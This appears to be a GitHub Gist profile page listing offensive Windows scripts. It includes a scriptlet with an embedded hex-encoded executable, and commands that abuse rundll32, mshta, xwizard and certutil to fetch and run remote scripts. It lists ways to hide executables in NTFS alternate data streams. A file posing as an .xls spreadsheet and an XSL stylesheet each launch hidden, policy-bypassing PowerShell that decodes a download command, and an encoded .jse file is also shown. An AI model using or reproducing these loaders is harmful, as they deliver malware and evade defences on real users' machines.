Skip to content

Instantly share code, notes, and snippets.

View cryptonic01's full-sized avatar
🚪
Out...

Cryptonic cryptonic01

🚪
Out...
11 followers · 33 following
  • Raşşa
View GitHub Profile
@cryptonic01
cryptonic01 / power.sct
Last active July 13, 2018 01:21
<?XML version="1.0"?>
<scriptlet>
<registration
progid="17807259"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var sBuffer = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030019F6DA580000000000000000E00002010B010B000014000000100000000000009E3200000020000000400000000040000020000000020000040000000000000004000000000000000080000000020000830B0100020040850000100000100000000010000010000000000000100000000000000000000000443200005700000000400000200C0000000000000000000000260000000F0000006000000C0000000C3100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000A4120000002000000014000000020000000000000000000000000000200000602E72737
@cryptonic01
cryptonic01 / instructions.txt
Created July 13, 2018 01:12 — forked from api0cradle/instructions.txt
xwizard_sct
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
@cryptonic01
cryptonic01 / Exe_ADS_Methods.txt
Created July 13, 2018 01:10 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
@cryptonic01
cryptonic01 / fad.xls
Created July 12, 2018 23:50
<RoOT XMlNS = "gzoprjonlbazvntlokftttscrjabkpkyvgrjzxrandsvlmrhedcywllhtcxxbygqaywgbjgiigrfobxmytqjnuoroufxndunwyimlecdygcjttfswcdegeuwfjdfiqugjdkeqsycjcijowjqadwnozznrszzztbnpmjmfkqwprqllwewitcoaqwhztbjaziypvmosqxctwhradjdy">
<script xmlns = "http://Www.W3.OrG/2000/svG" >
<![CDATA[
new ActiveXObject("wsCRiPT.sheLL").RuN( '"powErsheLL.EXe" POWersHEll.Exe -eX byPASS -NOp -w hIddEN -EC IAAgAAkAKAAgAAkAIABuAEUAdwAtAE8AQgBKAEUAYwB0AAkAIAAJACgAIAAJAAkAJwBzAFkAcwBUAEUATQAuAE4ARQBUAC4AVwBFAEIAJwAJAAsACQAJAAsACQArAAkACwAJACcAYwAnAAkACwAJAAkACwAJACsACQALAAkAJwBMAGkAJwAJAAsACQAJAAsACQArAAkACwAJACcAZQAnAAkACwAJAAkACwAJACsACQALAAkAJwBOACcACQALAAkACQALAAkAKwAJAAsACQAnAHQAJwAJAAsACQAgAAsAIAApACAACQAgACkALgAoAAkAIAAgACcAZAAnAAkAIAAgAAkAIAAgACsACQAgACAAJwBvACcACQAgACAACQAgACAAKwAJACAAIAAnAFcATgBMAE8AQQBkAEYAJwAJACAAIAAJACAAIAArAAkAIAAgACcASQBsAGUAJwAJACAAIAAgAAwACQApAC4ASQBuAFYATwBLAGUAKAAJAAkACQAoAFsAYwBIAEEAUgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANwA0ACAAIAAJACAAIAAJACsAIA
@cryptonic01
cryptonic01 / octopusgorup.xsl
Last active July 17, 2018 15:30
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c powERSHElL.ExE -eX ByPASS -nOP -W HiDDeN -Ec CQAgACAAKAAJACAAIABOAGUAVwAtAE8AQgBKAGUAYwB0AAkADAAgACgAIAAJACAAJwBzAHkAUwBUAGUAbQAuAE4ARQAnACAADAAJACAADAAJACsAIAAMAAkAJwB0AC4AdwAnACAADAAJACAADAAJACsAIAAMAAkAJwBlAEIAYwBMAEkARQBOACcAIAAMAAkAIAAMAAkAKwAgAAwACQAnAHQAJwAgAAwACQAgAAsAIAApACAADAAgACkALgAoACAACwAgACcARABPAHcATgBMAE8AYQBEACcAIAAJACAAIAAJACAAKwAgAAkAIAAnAGYAaQBMAGUAJwAgAAkAIAAJAAsACQApAC4AaQBOAFYAbwBrAEUAKAAgAAkACQAoAFsAYwBoAEEAUgBdAAkACwAgADAAeAA2ADgACQALACAACQALACAAKwAJAAsAIABbAGMASABBAFIAXQAJAAsAIAAwAHgANwA0AAkACwAgAAkACwAgACsACQALACAAWwBDAGgAQQByAF0ACQALACAAMAB4ADcANAAJAAsAIAAJAAsAIAArAAkACwAgAFsAYwBIAEEAcgBdAAkACwAgADAAWAA3ADAACQALACAACQALACAAKwAJAAsAIABbAGMASABhAFIAXQAJAAsAIAAwAFgANwAzAAkACw
@cryptonic01
cryptonic01 / do.jse
Last active June 12, 2018 22:05
#@~^fwcAAA==7 dUhi dzmDr\(64N+^OvJU^I&nKcju+^Sr# IiUvd dEEnKh3.kC+ssc2a2r7 d7 Pqo+:d 7`]mul"T77,!(+0diPdi~QdiP]Zub]Did~!X{cid~7iP_77,$^tm]Yd7,!oGcid,7d,_7d,$/4zITi7PZ6GZ77Pid,_7d~,1tCDY7d,!a{2dd~7iPQdi~]Z4mDYdd,!Xfbid~diPQ7iP$;4bMTdi~T(ysid~d7~3d7P]^CmID7iP!a+wd7Pi7,_7iP]mtzIY7d,!avyd7~idP37d,$Z_C.Tid,!pv17iP7d,QdiP,^4bDD7iPT6F*id~id,_diP]/CmDDdiPTp+ di~diP_i7~$;CmIDd7~Z({*i7Pid~QidP,/4b.Ti7,!a+&idPid,QdiP,Z4b.DidPZpv~dd,77P3diP,muCMT7d,T(+*77,dd~Qid~$14zDDid,!6Fci7Pid~_id~,;tlMDdiP!o+3diPid~_77,$^tm]Tid~Tovs77,d7P37iP,;CzDTid,T(F 7d,d7~3dd,,m4bDY77PZ(+G7d~7iPQdi~$1t)]Ydd~TX odi~id~3diP$;tm.Tid~!ovo7iPdi~_idP]^4b"Tid~!p2d7Pi7P3d7~]mCC.Yd7PZaFc7iPidP3di~$1tCDYd7~Z6vw7d,dd,Q7d,$1C)DD7iPT(FTdiP77,_d7~]Z4lMDid~Z(F*diPi7P3d7P]Zu)MTdi~!oG&i7~diP3d7P,/_l.Ti7PZ6{idP77,_7d,,;tCMTidPZ(F+diP7d,_77,$m_CIYdd,TavwdiP7d~Qid~$;4bMT77,!({Xid~di~3d7,$1tb"Ti7PZ({!id~7iP_i7P]mtz]DdiPZ6+s77,d7P37d,$/4zDT77,!av87iP7iP3dd,$;4bMT7d,!p{Zdd,7d,_di~,m_l"T7d~TXG*di~diPQ7iP$/4mDDdi~Z(fydiPdiP37d,$^CmDD7iP!Xf!idPi7~_id,$/C)]Yd7PZp wd